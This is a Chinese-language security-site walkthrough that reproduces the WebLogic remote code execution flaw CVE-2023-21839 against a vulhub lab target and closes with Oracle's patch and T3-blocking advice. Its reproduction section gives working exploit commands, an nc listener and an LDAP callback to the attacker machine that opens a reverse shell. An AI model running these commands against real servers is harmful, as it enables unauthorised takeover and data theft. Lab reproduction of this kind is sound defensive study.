freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Weblogic远程代码执行漏洞CVE-2023-21839复现
Slimmings 2023-04-27 15:59:55 343033
所属地 福建省

1.漏洞概述

WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
2023 年 4 月 19 日 , Oracle 发 布 安 全 补 丁 修 复 WebLogic 中 间 件 漏 洞存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

2.影响版本

12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

3.环境准备

主机准备

linux主机:1台(靶机)
kail:1台(攻击机)

相关软件包

CVE-2023-21839:
https://github.com/4ra1n/CVE-2023-21839
JNDIExploit.v1.2:
https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2

4.环境搭建

靶机(本文采用centos7搭建docker拉取镜像)
安装docker

添加阿里镜像源:
yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce
更新yum软件包索引:
yum makechache fast
安装docker-ce
yum install docker-ce docker-ce-cli containerd.io
启动docker
systemctl start docker
docker自启动
systemctl enable docker
查看版本,显示版本即安装成功
docker version

安装docker-compose

安装pip
yum install -y python-pip
更新pip(centos7默认安装的python版本为2.7,对于该版本pip无法更新到最新版本,需要指定pip版本为20.3.4)
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com --upgrade pip==20.3.4
安装docker-compose
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com docker-compose
查看docker-compose版本(有返回则说明安装成功)
docker-compose -v

漏洞环境搭建

拉取漏洞环境到本地
git clone git://github.com/vulhub/vulhub.git
启用漏洞环境
成功拉取镜像后本地生成目录:vulhub
image
到对应目录下启用环境:
image
访问页面:
http://ip:7001/console/login/LoginForm.jsp 即可访问到后台管理登录界面,出现以下界面证明环境搭建成功
image

5.工具准备

CVE-2023-21839

访问链接下载工具:
https://github.com/4ra1n/CVE-2023-21839
image
上传到kail进行编译
给kail安装go环境:
apt install gccgo-go
解压工具CVE-2023-21839:
unzip CVE-2023-21839.zip
到对应目录下进行编译,将会生成对应工具:
cd CVE-2023-21839-master/cmd
go build -o CVE-2023-21839
image

JNDIExploit.v1.2

访问链接下载:
https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
image
上传至kail上并解压准备使用:
unzip JNDIExploit.v1.2.zip

6.漏洞复现

使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.230.129(攻击机IP)
image
在kail上设置监听:
nc -lvp 8866
image
使用CVE-2023-21839工具来进行攻击测试(其中192.168.230.128为靶机IP,192.168.230.129为攻击机kail的IP):
cd CVE-2023-21839-master/cmd
./CVE-2023-21839 -ip 192.168.230.128 -port 7001 -ldap ldap://192.168.230.129:1389/Basic/ReverseShell/192.168.230.129/8866
image
image
反弹shell成功:
image

7.修复建议

官方修复措施

Oracle官方已发布修复方案,建议及时更新。
https://www.oracle.com/security-alerts/cpuapr2023.html

临时处置和应对措施

禁用T3协议,或者对协议端口进行访问控制。

# 渗透测试 # 网络安全 # web安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Slimmings 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Slimmings LV.1
这家伙太懒了,还未填写个人描述!
  • 2 文章数
  • 1 关注者
fastjson 1.2.47 RCE漏洞保姆级复现
2022-12-12